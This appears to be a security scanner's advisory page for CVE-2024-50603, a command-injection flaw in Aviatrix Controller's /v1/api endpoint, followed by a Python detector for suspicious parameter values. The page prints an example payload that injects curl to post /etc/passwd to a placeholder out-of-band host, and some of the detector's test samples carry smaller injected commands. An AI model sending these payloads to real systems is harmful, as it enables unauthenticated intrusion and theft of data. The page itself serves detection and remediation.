CVE-2024-50603 Scanner
CVE-2024-50603 Scanner - Remote Code Execution vulnerability in Aviatrix Controller
Short Info
Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 9 days 21 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -
Aviatrix Controller is a centralized platform used for managing and monitoring multi-cloud networking solutions. It enables enterprises to configure and maintain their cloud-based infrastructure with a focus on security and scalability. The product is widely adopted by organizations that require seamless integration across multiple cloud service providers. Aviatrix Controller provides features such as automated network creation, dynamic routing, and network security enhancements. This platform is designed for network engineers and security teams to simplify operations and ensure compliance. Its user-friendly interface and robust API make it a popular choice for hybrid and multi-cloud environments.
This scanner detects a Remote Code Execution (RCE) vulnerability in Aviatrix Controller. The vulnerability arises from improper neutralization of special characters used in OS commands. Exploiting this flaw allows an unauthenticated attacker to execute arbitrary commands on the host system. This vulnerability is rated as critical due to its potential impact on confidentiality, integrity, and availability. Attackers can exploit this issue via the `/v1/api` endpoint by sending crafted payloads. This vulnerability is a significant security concern for organizations using vulnerable versions of Aviatrix Controller.
The technical root of this vulnerability is the improper handling of user-supplied input in the `cloud_type` and `src_cloud_type` parameters at the `/v1/api` endpoint. These parameters are used in API actions such as `list_flightpath_destination_instances` and `flightpath_connection_test`. Shell metacharacters within these fields are not correctly sanitized, allowing attackers to execute arbitrary shell commands. For instance, a malicious payload such as `1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})` can be used to exfiltrate sensitive data. The vulnerability affects Aviatrix Controller versions before 7.1.4191 and 7.2.x before 7.2.4996. Organizations must update to secure versions to mitigate this risk.
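For defenders triaging exposure, the following Python is an added example (not code from this page, the scanner, or Aviatrix) that flags `cloud_type` and `src_cloud_type` values containing anything other than plain tokens in requests to `/v1/api`, and checks a controller version against the affected ranges stated above. It assumes form-encoded request bodies, dotted numeric version strings, and an allowlist of short alphanumeric values; the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Parameters named in the text above as reaching an OS command unsanitized.
WATCHED_PARAMS = ("cloud_type", "src_cloud_type")
# Assumption: legitimate values are short alphanumeric tokens; all else is flagged.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def suspicious_params(body):
    """Return (action, param, value) for watched params that fail the allowlist."""
    fields = parse_qs(body)  # decodes %XX escapes and '+' before matching
    action = fields.get("action", [""])[0]
    return [
        (action, name, value)
        for name in WATCHED_PARAMS
        for value in fields.get(name, [])
        if not SAFE_VALUE.fullmatch(value)
    ]


def is_affected(version):
    """True for versions before 7.1.4191, and for 7.2.x before 7.2.4996."""
    parts = tuple(int(p) for p in version.split("."))
    if parts[:2] == (7, 2):
        return parts < (7, 2, 4996)
    return parts < (7, 1, 4191)


# Constructed sample request bodies for POST /v1/api (not captured traffic).
SAMPLES = [
    "action=list_flightpath_destination_instances&cloud_type=1",
    "action=flightpath_connection_test&src_cloud_type=1%7C%24%28id%29",
    "action=list_flightpath_destination_instances&cloud_type=1|id",
]

if __name__ == "__main__":
    for body in SAMPLES:
        for action, name, value in suspicious_params(body):
            print(f"ALERT action={action} {name}={value!r}")
    for v in ("7.1.4105", "7.1.4191", "7.2.4820", "7.2.4996"):
        print(v, "affected" if is_affected(v) else "fixed")
```

Matching on the decoded value matters here: the second sample carries its metacharacters percent-encoded and would slip past a check run on the raw body.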
Exploiting this vulnerability could result in unauthorized command execution on the affected system. Potential impacts include exfiltration of sensitive data, deployment of malicious software, and complete system compromise. Attackers could gain persistent access to the network, undermining organizational security. This could lead to data breaches, service disruptions, and significant financial and reputational losses. The critical nature of this vulnerability demands immediate attention and remediation to prevent exploitation.
REFERENCES
- https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- https://docs.aviatrix.com/documentation/latest/network-security/index.html
- https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- https://nvd.nist.gov/vuln/detail/CVE-2024-50603